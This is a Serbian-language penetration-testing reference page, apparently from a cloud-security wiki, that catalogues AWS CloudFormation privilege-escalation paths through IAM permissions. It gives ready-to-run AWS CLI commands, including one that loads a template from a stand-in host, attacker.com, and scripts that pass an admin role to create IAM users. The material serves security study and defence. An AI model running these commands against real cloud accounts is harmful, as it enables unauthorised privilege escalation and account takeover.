AWS - Cloudformation Privesc

cloudformation

Za više informacija o cloudformation-u pogledajte:

iam:PassRole, cloudformation:CreateStack

Napadač sa ovim dozvolama može povećati privilegije kreiranjem CloudFormation stack-a sa prilagođenim šablonom, smeštenim na njihovom serveru, da izvrši akcije pod dozvolama određene uloge:

aws cloudformation create-stack --stack-name <stack-name> \
--template-url http://attacker.com/attackers.template \
--role-arn <arn-role>

Na sledećoj stranici imate primer eksploatacije sa dodatnim dozvolama cloudformation:DescribeStacks:

Potencijalni uticaj: Povećanje privilegija na određenu ulogu usluge cloudformation.

iam:PassRole, (cloudformation:UpdateStack | cloudformation:SetStackPolicy)

U ovom slučaju možete zloupotrebiti postojeći cloudformation stack kako biste ga ažurirali i povećali privilegije kao u prethodnom scenariju:

aws cloudformation update-stack \
--stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
--capabilities CAPABILITY_IAM \
--region eu-west-1

Dozvola cloudformation:SetStackPolicy može se koristiti da sebi dodelite dozvolu UpdateStack nad stekom i izvršite napad.

Potencijalni uticaj: Privesc na određenu ulogu usluge cloudformation.

cloudformation:UpdateStack | cloudformation:SetStackPolicy

Ako imate ovu dozvolu, ali nemate iam:PassRole, i dalje možete ažurirati korišćene stekove i zloupotrebiti IAM uloge koje su već pridružene. Pogledajte prethodni odeljak za primer eksploatacije (samo nemojte navesti ulogu pri ažuriranju).

Dozvola cloudformation:SetStackPolicy može se koristiti da sebi dodelite dozvolu UpdateStack nad stekom i izvršite napad.

Potencijalni uticaj: Privesc na ulogu usluge cloudformation koja je već pridružena.

iam:PassRole,((cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

Napadač sa dozvolom da prosledi ulogu i kreira i izvrši ChangeSet može kreirati/ažurirati novi stek cloudformationa i zloupotrebiti uloge usluge cloudformationa kao i sa CreateStack ili UpdateStack.

Sledeći napad je varijacija CreateStack napada koristeći dozvole za ChangeSet za kreiranje steka.

aws cloudformation create-change-set \
--stack-name privesc \
--change-set-name privesc \
--change-set-type CREATE \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::947247140022:role/CloudFormationAdmin \
--capabilities CAPABILITY_IAM \
--region eu-west-1

echo "Waiting 2 mins to change the stack"
sleep 120

aws cloudformation execute-change-set \
--change-set-name privesc \
--stack-name privesc \
--region eu-west-1

echo "Waiting 2 mins to execute the stack"
sleep 120

aws cloudformation describe-stacks \
--stack-name privesc \
--region eu-west-1

Dozvola cloudformation:SetStackPolicy može se koristiti da sebi dodelite dozvole za ChangeSet nad stack-om i izvršite napad.

Potencijalni uticaj: Privesc na uloge usluge cloudformation.

(cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

Ovo je slična metoda kao prethodna, ali bez prosleđivanja IAM uloga, tako da možete samo zloupotrebiti već pridružene uloge, samo izmenite parametar:

--change-set-type UPDATE

Potencijalni uticaj: Privesc na ulogu usluge CloudFormation koja je već pridružena.

iam:PassRole,(cloudformation:CreateStackSet | cloudformation:UpdateStackSet)

Napadač bi mogao iskoristiti ove dozvole da bi kreirao/ažurirao StackSet-ove kako bi zloupotrebio/arbitrirao uloge CloudFormation-a.

Potencijalni uticaj: Privesc na uloge usluge CloudFormation.

cloudformation:UpdateStackSet

Napadač bi mogao iskoristiti ovu dozvolu bez dozvole passRole da bi ažurirao StackSet-ove kako bi zloupotrebio pridružene uloge CloudFormation-a.

Potencijalni uticaj: Privesc na pridružene uloge CloudFormation-a.

Reference

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/